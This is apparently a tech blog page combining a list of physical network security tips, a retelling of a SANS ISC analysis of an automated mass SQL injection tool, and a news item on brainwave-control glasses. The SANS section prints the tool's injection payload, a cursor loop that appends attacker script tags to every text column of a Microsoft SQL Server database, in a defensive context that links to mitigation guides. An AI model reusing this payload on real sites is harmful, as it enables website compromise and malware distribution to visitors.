Technology Up To Date

There are 10 physical the most essential security measures every organization should take, if you haven’t already done so of course.

#1: Lock up the server room
The server room is the heart of your physical network, and someone with physical access to the servers, switches, routers, cables and other devices in that room can do enormous damage.

#2: Set up surveillance
No doubt you need a way to know who goes in and out and when.
A better solution than the log book is an authentication system incorporated into the locking devices, so that a smart card, token, or biometric scan is required to unlock the doors, and a record is made of the identity of each person who enters.

A video surveillance camera, placed in a location that makes it difficult to tamper with or disable (or even to find) but gives a good view of persons entering and leaving should supplement the log book or electronic access system. Surveillance cams can monitor continuously, or they can use motion detection technology to record only when someone is moving about. They can even be set up to send e-mail or cell phone notification if motion is detected when it shouldn’t be (such as after hours).

#3: Make sure the most vulnerable devices are in that locked room
Because it’s not just the servers you have to worry about. A hacker can plug a laptop into a hub and use sniffer software to capture data traveling across the network.
#4: Use rack mount servers
Rack mount servers not only take up less server room real estate; they are also easier to secure.
#5: Don’t forget the workstations
Hackers can use any unsecured computer that’s connected to the network to access or delete information that’s important to your business.

#6: Keep intruders from opening the case
Both servers and workstations should be protected from thieves who can open the case and grab the hard drive.

#7: Protect the portables
Handhelds can be locked in a drawer or safe or just slipped into a pocket and carried on your person when you leave the area. Motion sensing alarms such as the one at SecurityKit.com are also available to alert you if your portable is moved.

#8: Pack up the backups
Backing up important data is an essential element in disaster recovery, but don’t forget that the information on those backup tapes, disks, or discs can be stolen and used by someone outside the company..

Don’t overlook the fact that some workers may back up their work on floppy disks, USB keys, or external hard disks. If this practice is allowed or encouraged, be sure to have policies requiring that the backups be locked up at all times.

#9: Disable the drives
If you don’t want employees copying company information to removable media, you can disable or remove floppy drives, USB ports, and other means of connecting external drives.

#10: Protect your printers
You might not think about printers posing a security risk, but many of today’s printers store document contents in their own on-board memories. Also think about the physical security of documents that workers print out, especially extra copies or copies that don’t print perfectly and may be just abandoned at the printer or thrown intact into the trash can where they can be retrieved.
You have to remember that network security starts at the physical level. All the firewalls in the world won’t stop an intruder who is able to gain physical access to your network and computers, so lock up as well as lock down.

Back in January there were multiple reports about a large number of web sites being compromised and serving malware, wrote Bojan Zdrnja, on the institute’s blog. “While we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used,” Zdrnja wrote. Then he proposes some helpful advices to avoid that.

So, the tool does is this:

The user can configure the tag that will be inserted on the compromised web sites. By default, the tool we recovered had the following string embedded: http://www.2117966 [dot] net/fuckjp.js. Sounds familiar? See https://isc.sans.org/diary.html?storyid=4139
The tool then checks something with a site in China. My guess at this point in time is that the attackers get paid for this since the tool calls a script pay.asp with an argument SN to verify something.
Now the user can start the tool. It will connect to Google and will search for vulnerable sites with the following query string: inurl:”.asp” inurl:”a=”. The parameter is configurable and the tool can search for many strings. For crawling, the tool uses a built-in embedded browser from bsalsa (http://www.bsalsa.com)
Once the URLs have been identified, the tool tries to attack the web sites with SQL Injection (I still have to analyze this part further to see how it works). The SQL injection string, though, is visible in the file and formatted with the tag defined in the first. Here is how the SQL Injection statement gets formulated
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype=’u’ a
nd (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec(‘up
date ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+”
”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
%20AS%20NVARCHAR(4000));EXEC(@S);–

The nice thing about this is that we finally managed to confirm that it is SQL Injection that was used in those attacks. The tool has more functionality that we still have to analyze but this is the main purpose.

Check your applications and make sure that they are not vulnerable. We covered this many times in various diaries, so here are few links to online resources that can help with this:

http://www.owasp.org/index.php/Top_10_2007-A2#Protection

http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx

http://portal.spidynamics.com/blogs/msutton/archive/2006/09/26/How-Prevalent-Are-SQL-Injection-Vulnerabilities_3F00_.aspx

http://erratasec.blogspot.com/2007/08/sql-injection-is-surpisingly-easy.html

Also “The SQL in question uses table cursors (as variable Table_Cursor) to enumerate all tables on Microsoft SQL server and the respective columns that are of type ntext, text, nvarchar, or varchar AND the table type is a user table and not a system table. The code then proceeds to utilize a cursor while loop to iterate through the returned results updating each table.columname concatenating it’s current value with an arbitrary value (which appears missing in your SQL, it would appear in the [HERE] area of the query part “rtrim(convert(varchar,['+@C+']))+’[HERE]‘”

The code converts the current data to varchar during concatenation to avoid any cast issues and removes any trailing space to the right of the field value.
The cursor is deallocated after update (how nice of them)”

Bojan’s dairy you can find here – http://isc.sans.org/diary.html?storyid=4294
Thanks him for great submissions.

New software Cyber MC from Orange Dreams will get you the chance to be closer to the Matrix. Can you believe it? There are quite a few things about the Cyber MC brainwave management solution that remain unclear to us, but it’s probably for the best. Korean startup Orange Dreams has apparently concocted some sort of eyewear / software combo that can control your brainwaves and calm your nerves.

There are numerous ways to lose weight or quit smoking, but most of those dated methods require will power and a desire for self improvement. With the new approach Orange Dream is going to help the persons that would rather spend money then exert effort. The Korean companies new Cyber MC glasses aim to help improve your education, loss weight, quit smoking, and relieve stress. If all else fails you can also play games with the glasses.

Details are still thin on how exactly these glasses take advantage of your ‘brain waves’, but it looks as if they flash images in an Orwellian brainwashing fashion. If you are ready to embrace this brave new world the Cyber MC the software and glasses will be available this April.